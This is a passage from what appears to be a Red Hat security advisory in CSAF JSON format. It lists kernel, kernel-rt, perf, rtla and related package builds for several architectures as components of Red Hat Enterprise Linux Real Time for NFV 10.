"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
